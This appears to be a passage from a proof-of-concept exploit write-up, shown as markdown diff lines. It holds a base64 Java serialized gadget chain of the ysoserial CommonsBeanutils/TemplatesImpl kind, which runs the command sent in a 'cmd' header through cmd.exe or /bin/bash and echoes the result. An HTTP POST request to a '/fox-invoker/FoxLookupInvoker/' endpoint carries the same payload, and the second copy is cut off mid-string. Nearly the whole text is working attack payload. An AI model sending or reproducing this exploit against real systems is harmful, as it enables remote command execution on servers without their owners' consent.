+rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK/K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9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
+```
+
+2. poc
+
+```plain
+POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Connection: close
+cmd: echo stctest
+ 
+{{base64dec(rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK/K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQALdG9Mb3dlckNhc2UBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQARZ2V0RGVjbGFyZWRNZXRob2QBADl5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8xNDk4MTQ2NTg4MTUxNjYBADtMeXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRDbWRFY2hvMTQ5ODE0NjU4ODE1MTY2OwAhAEQARQAAAAAABAABAEYARwABAEgAAAAvAAEAAQAAAAUqtwABsQAAAAIASQAAAAYAAQAAAAkASgAAAAwAAQAAAAUASwEEAAAAAQBNAE4AAgBIAAAAPwAAAAMAAAABsQAAAAIASQAAAAYAAQAAAFcASgAAACAAAwAAAAEASwEEAAAAAAABAE8AUAABAAAAAQBRAFIAAgBTAAAABAABAFQAAQBNAFUAAgBIAAAASQAAAAQAAAABsQAAAAIASQAAAAYAAQAAAFwASgAAACoABAAAAAEASwEEAAAAAAABAE8AUAABAAAAAQBWAFcAAgAAAAEAWABZAAMAUwAAAAQAAQBUAAgAWgBHAAEASAAABdUACAARAAAC/QM7uAACtgADTCu2AAQSBbYABk0sBLYABywrtgAIwAAJwAAJTgM2BBUELb6iAs0tFQQyOgUZBccABqcCuRkFtgAKOgYZBhILtgAMmgANGQYSDbYADJoABqcCmxkFtgAEEg62AAZNLAS2AAcsGQW2AAg6BxkHwQAPmgAGpwJ4GQe2AAQSELYABk0sBLYABywZB7YACDoHGQe2AAQSEbYABk2nABY6CBkHtgAEtgATtgATEhG2AAZNLAS2AAcsGQe2AAg6BxkHtgAEtgATEhS2AAZNpwAQOggZB7YABBIUtgAGTSwEtgAHLBkHtgAIOgcZB7YABBIVtgAGTSwEtgAHLBkHtgAIwAAWwAAWOggDNgkVCRkIuQAXAQCiAcsZCBUJuQAYAgA6ChkKtgAEEhm2AAZNLAS2AAcsGQq2AAg6CxkLtgAEEhoDvQAbtgAcGQsDvQAdtgAeOgwZC7YABBIfBL0AG1kDEiBTtgAcGQsEvQAdWQMSIVO2AB7AACA6BhkGxgFXGQa2ACKaAU8ZDLYABBIjBL0AG1kDsgAkU7YAHBkMBL0AHVkDuwAlWREAyLcAJlO2AB5XEie4ACi2ACkSKrYADJkAGQa9ACBZAxIrU1kEEixTWQUZBlOnABYGvQAgWQMSLVNZBBIuU1kFGQZTOg27AC9ZuwAwWRkNtwAxtgAytgAztwA0EjW2ADa2ADe2ADg6DhI5uAA6Og8ZD7YAOzoHGQ8SPAa9ABtZAxI9U1kEsgAkU1kFsgAkU7YAPhkHBr0AHVkDGQ5TWQS7ACVZA7cAJlNZBbsAJVkZDr63ACZTtgAeVxkMtgAEEj8EvQAbWQMZD1O2ABwZDAS9AB1ZAxkHU7YAHlenAE46DxJBuAA6OhAZEBJCBL0AG1kDEj1TtgA+GRAEvQAdWQMZDlO2AB46BxkMtgAEEj8EvQAbWQMZEFO2ABwZDAS9AB1ZAxkHU7YAHlcEOxqZAAanAAmECQGn/i8amQAGpwARpwAIOgWnAAOEBAGn/TKnAARLsQAIAJUAoACjABIAwwDRANQAEgITAoYCiQBAAC4AOQLtAEMAPABXAu0AQwBaAHoC7QBDAH0C5wLtAEMAAAL4AvsAQwADAEkAAAD+AD8AAAANAAIADgAJAA8AEwAQABgAEQAkABIALgAUADQAFQA8ABYAQwAXAFoAGABlABkAagAaAHIAGwB9ABwAiAAdAI0AHgCVACAAoAAjAKMAIQClACIAtgAkALsAJQDDACcA0QAqANQAKADWACkA4QArAOYALADuAC0A+QAuAP4ALwEMADABGwAxASYAMgExADMBNgA0AT4ANQFXADYBfQA3AYoAOAG1ADkB8AA6AhMAPAIaAD0CIQA+AmQAPwKGAEQCiQBAAosAQQKSAEICsgBDAtQARQLWAEcC3QAwAuMASQLqAEwC7QBKAu8ASwLyABIC+